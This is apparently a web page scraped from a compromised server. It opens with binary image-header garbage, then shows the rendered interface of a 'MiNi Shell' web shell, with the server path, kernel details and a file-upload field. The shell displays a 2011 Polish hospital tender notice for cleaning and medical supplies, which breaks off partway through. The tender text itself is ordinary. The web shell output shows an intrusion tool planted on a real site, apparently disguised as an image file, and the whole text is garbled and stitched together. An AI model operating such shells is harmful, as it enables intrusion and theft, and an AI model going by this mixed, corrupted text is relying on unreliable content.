JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111024/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111024/278261-N-2011.html

<p class="kh_header"><b>Łódź: ZP/66/2011 Sprzęt do utrzymania czystości</b><br>
<b>Numer ogłoszenia: 278261 - 2011; data zamieszczenia: 24.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut "Centrum Zdrowia Matki Polki" - Samodzielna Sekcja Zamówień Publicznych , ul. Rzgowska 281/289, 93-338 Łódź, woj. łódzkie, tel. 42 2711188, 2711069, faks 42 2711187.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iczmp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/66/2011 Sprzęt do utrzymania czystości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet 1									
1.Ścierka ostra	7 500	szt						
2.Gąbka do naczyń rozm. 6 x 10 cm	2 000	szt						
3.Ściereczka uniwersalna o boku od 30 - 40 cm x 40 do 55  kolor wg. zamówienia niebieski, różowy, żółty	12 000	szt					
4.Ścierka do podłogi wiskoza z polipropylenem	1 000	szt						
5.Szufelki z gumką + zmiotka	50	kpl						
6.Rękawice gospodarcze z naturalnego lateksu z bawełnianą wyściółką. Rozmiary od S do XL według zamówienia.	1 800	par						
7.Szczotki do mycia zębów - twarde	40	szt						
8.Maszynka jednorazowa do golenia  z 3 ostrzami automatycznie dopasowywującymi się do ciała 	5 000	szt						
10.Wiadra plastikowe 10-12 litrów z pokrywą	50	szt						
11.Zasłony do brodzika 130 cm x 200 cm	10	szt	
Pakiet 2									
1.Pad do szorowarki czarny lub brązowy - średn. 43 cm	30	szt	
Pakiet 3									
1.Szczotka do WC z pojemnikiem szczotka umieszczona w pojemniku wisząca na nim z osłoną przymocowaną do uchwytu szczotki	30	szt						
2Pojemnik na pojedyncze ręczniki jednorazowe w listkach składanych w ZZ, wymiar listka 25cm x 23cm  poj. na  min  400 listków. ręczn.	20	szt	
Pakiet 4									
1.Papier toaletowy w rolce, gramatura 38-40g/m2, gofrowany, perforowany, minimalna długość 30m, szerokość wstęgi 9.5cm -10cm	50 000	szt						
2.Ręcznik papierowy listki, składany w ZZ, wymiar listka 25cm x 23cm, ( 1 op. = 200 listków), utwardzany w celu podniesienia wytrzymałości w stanie mokrym, gofrowany. Ręcznik zapewnia osuszenie rąk za pomocą 1- 2 listków. W kolorze białym lub szarym. 	54 800	op					
Pakiet 5									
1.Wózek sprzątacza - chromowany  dwa wiadra, wyciskarka, koszyk/ 5 szt						
2.Stelaż do wózka - 40 cm na mop z kieszenią/	40	szt						
3.Kij do stelaża	40	szt						
4.Mop zmywak - płaski pętelkowo-frędzelkowy, bawełniany z kieszenią 40 cm.  Waga mopa minimum 140g Temperatura prania 95oC. Kodowane kolorystycznie /kolor wg. zamówienia niebieski, czerwony, żółty	1 200	szt						
5.Mop zmywak 50cm z kieszenią kodowany kolorystycznie /kolor wg. Zamówienia niebieski ,czerwony, żółty	10	szt						
6.mop mały wkręcany	40	szt				
Pakiet 6									
1.Stelaż do mycia okien i ścian - 35 cm	10	szt						
2.Kij do stelaża do mycia okien i ścian	10	szt						
3.Wkład zmywaka do okien futerkowy zapinany na rzep - 35 cm	25	szt
Pakiet 7									
1.Szorowarka ręczna do pracy z kijem	10	szt						
2.Kij do szorowarki	10	szt						
3.Pad prostokątny do szorowarki - 25 x 12 cm czarny lub brązowy	30	szt
Pakiet 8									
1.Ściągaczka z gumą do szyb - 35 cm	6	szt						
2.Kij do ściągaczki do szyb	6	szt						
3Guma do ściągaczki	20	mb				
Pakiet 9								
1.Skrobaczka do szyb z rączką - dł ostrza 10 cm	10	szt						
2.Ostrza do skrobaczki dł 10 cm	30	szt		
Pakiet 10									
1.Jednorazowe prześcieradło papierowe w rolce szer. 60cm dł 80 m - dwuwarstwowe, gofrowane	312	rolka				
Pakiet 11									
1.Jednorazowe prześcieradło papierowe w rolce szer. 40cm dł 80 m - dwuwarstwowe, gofrowane	36	rolka				
Pakiet 12									
1.Jednorazowy ręcznik papierowe w rolce dwuwarstowy, biały odcinki 25x30	48	rolka						
Pakiet 13									
1.Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak mozliwości ponownego otwarcia oraz zamknięcia pojemnika. Na pojemniku widnieje etykieta zawierająca piktogram, którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 0,70 l	4000	szt						
2.Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak mozliwości ponownego otwarcia oraz zamknięcia pojemnika. Na pojemniku widnieje etykieta zawierająca piktogram, którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 1l	1 000	szt						
3.Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak mozliwości ponownego otwarcia oraz zamknięcia pojemnika. Na pojemniku widnieje etykieta zawierająca piktogram, którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 2l	5 000	szt						
4.Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak mozliwości ponownego otwarcia oraz zamknięcia pojemnika. Na pojemniku widnieje etykieta zawierająca piktogram, którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 5l	300	szt						
5.Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak mozliwości ponownego otwarcia oraz zamknięcia pojemnika. Na pojemniku widnieje etykieta zawierająca piktogram, którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 20l	600	szt						
6.Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak mozliwości ponownego otwarcia oraz zamknięcia pojemnika. Na pojemniku widnieje etykieta zawierająca piktogram, którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 30l	600	szt		
Pakiet 14									
1.Emulsja na bazie wosku pszczelego do pielęgnacji wrażliwej, suchej oraz skłonnej do podrażnień skóry rąk personelu medycznego.
Zawierająca w swoim składzie między innymi kompleks witamin C, E, F. Doskonale regeneruje i odżywia podrażnioną i zniszczoną skórę rąk, poprawia naturalną wilgotność i elastyczność skóry, o naturalnym dla skóry pH.Po nałożeniu z łatwością się rozprowadza i bardzo szybko się wchłania, nie pozostawia uczucia lepkości skóry, posiada przyjemny delikatny zapach.
Opakowania 500 ml z pompką dozującą. 300	litr						
Pakiet 15									
1.ostrza do strzygarki zestaw do strzyżenia owłosienia przed zabiegami chirurgicznymi ostrza jednkrotnego uzytku o szerokości 3,8 cm szerokośc brzegu tnącego 30 mm umozliwiające zgodnie z techniką aseptyczną (bezdotykowo) ostrza skonstruowane w sposób wykluczający uszkodzenia skóry,  możliwość usuwania owłosienia z każdej częsci ciała możliwość usuwania włosów krótkich i długich suchych i mokrych nakłądane na główkę strzygarki pakowane w plastikowe przezroczyste opakowanie zaklejone z wierzchu biała folią zawierającą opis oraz nr katalogowy. Pakowane w opakowania zbiorcze po 50 ostrzy	1 000	szt						
2.strzygarka z ruchomą głowicą ułatwiającą usuwanie owłosienia z trudno dostępnych okolic ciała: ostrza jednokrotnego uzytku o serokości 3,8 cm : szerokośc brzegu tnącego 30 mm umozliwjające wymanię zgodnie z techniką aseptyczną (dezdotykowo) ostrza skonstruowane w sposób wykluczający uszkodzenia skóry mozliwość usuwania owłosienia z każdej części ciała, możliwosc usuwania włosów krótkich i długich suchych i mokrych zapewniająca minimum 60minut pracy po pełnym naładowaniu baterii bateria typu NIMH kompatybilna ładowarka spełniająca wymogi Dyrektywy 93/42/EEC	250	szt						
3.ładowarka do strzygarki	250	szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty opisujące specyfikę wyrobu dotyczy  pakietu 14 -Zgłoszenie do Krajowego Systemu Informowania o Kosmetykach</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca przewiduje wykonanie zamówienia z udziałem podwykonawców, Zamawiający żąda dołączenia do Oferty wypełnionego oświadczenia z wykazem zakresu części zamówienia zlecanych podwykonawcom. W przypadku braku takiego załącznika Zamawiający uzna, że całość zamówienia zostanie wykonana przez Wykonawcę siłami własnymi</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art.144 ust. 1 PZP Zamawiający przewiduje możliwość dokonania zmiany w zawartej umowie w następujących sytuacjach:
1.zmiany stawki podatku VAT
2.w przypadku niewykorzystania części asortymentu możliwa jest zmiana terminu realizacji zamówienia przedłużenie okresu obowiązywania umowy 
3.zmiany sposobu konfekcjonowania a co za tym idzie liczby opakowań. W wyniku niniejszych zmian Zamawiający przewiduje możliwość zmiany ceny jednostkowej opakowania, która zostanie wyliczona z proporcji.
4.zmiany organizacyjnej Instytutu CZMP istotnej dla realizacji niniejszej umowy;
5.zmiany organizacji  pracy Instytutu CZMP istotnej dla realizacji niniejszej umowy
6.zmiany formy prawnej prowadzonej działalności gospodarczej ;
7.zmiany adresu siedziby firmy oraz siedziby  serwisu i zmianie adresu zamieszkania właściciela lub współwłaściciela firmy;
8.w przypadku gdy zmiana jest korzystna dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iczmp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Centrum Zdrowia Matki Polki ,93-338 Łódź ul. Rzgowska 281/289 Samodzielna Sekcja Zamówień Publicznych pawilon A( Ginekologiczno-Położniczy) poziom 0 pok.nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2011 godzina 10:00, miejsce: Instytut Centrum Zdrowia Matki Polki ,93-338 Łódź ul. Rzgowska 281/289 Samodzielna Sekcja Zamówień Publicznych pawilon A( Ginekologiczno-Położniczy) poziom 0 pok.nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Ścierka ostra	7 500	szt
2.Gąbka do naczyń rozm. 6 x 10 cm	2 000	szt
3.Ściereczka uniwersalna o boku od 30 - 40 cm x 40 do 55  /kolor wg. zamówienia niebieski, różowy, żółty/	12 000	szt
4.Ścierka do podłogi wiskoza z polipropylenem	1 000	szt
5.Szufelki z gumką + zmiotka	50	kpl
6.Rękawice gospodarcze z naturalnego lateksu z bawełnianą wyściółką. Rozmiary od S do XL według zamówienia.	1 800	par
7.Szczotki do mycia zębów - twarde	40	szt
8.Maszynka jednorazowa do golenia  z 3 ostrzami automatycznie dopasowywującymi się do ciała 	5 000	szt
10.Wiadra plastikowe 10-12 litrów z pokrywą	50	szt
11.Zasłony do brodzika 130 cm x 200 cm	10	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena Jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Pad do szorowarki czarny lub brązowy - średn. 43 cm	30 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Szczotka do WC z pojemnikiem /szczotka umieszczona w pojemniku wisząca na nim z osłoną przymocowaną do uchwytu szczotki/	30	szt
2.Pojemnik na pojedyncze ręczniki jednorazowe w listkach składanych w ZZ, wymiar listka 25cm x 23cm / poj. na  min  400 listków. ręczn./	20	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Papier toaletowy w rolce, gramatura 38-40g/m2, gofrowany, perforowany, minimalna długość 30m, szerokość wstęgi 9.5cm -10cm	50 000	szt
2.Ręcznik papierowy listki, składany w ZZ, wymiar listka 25cm x 23cm, ( 1 op. = 200 listków), utwardzany w celu podniesienia wytrzymałości w stanie mokrym, gofrowany. Ręcznik zapewnia osuszenie rąk za pomocą 1- 2 listków. W kolorze białym lub szarym. 	54 800	op.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena Jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wózek sprzątacza - chromowany / dwa wiadra, wyciskarka, koszyk/	5	szt
2.Stelaż do wózka - 40 cm /na mop z kieszenią/	40	szt
3.Kij do stelaża	40	szt
4.Mop /zmywak/ - płaski pętelkowo-frędzelkowy, bawełniany z kieszenią 40 cm.  Waga mopa minimum 140g Temperatura prania 95oC. Kodowane kolorystycznie /kolor wg. zamówienia niebieski, czerwony, żółty/ 	1 200	szt
5.Mop/zmywak/ 50cm z kieszenią kodowany kolorystycznie /kolor wg. Zamówienia niebieski ,czerwony, żółty 10	szt
6.mop mały wkręcany	40	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena Jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Stelaż do mycia okien i ścian - 35 cm	10	szt
2.Kij do stelaża do mycia okien i ścian	10	szt
3.Wkład zmywaka do okien futerkowy zapinany na rzep - 35 cm	25	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> pakiet 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Szorowarka ręczna /do pracy z kijem/	10	szt
2.Kij do szorowarki	10	szt
3.Pad prostokątny do szorowarki - 25 x 12 cm czarny lub brązowy	30	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> pakiet n 8.</p>
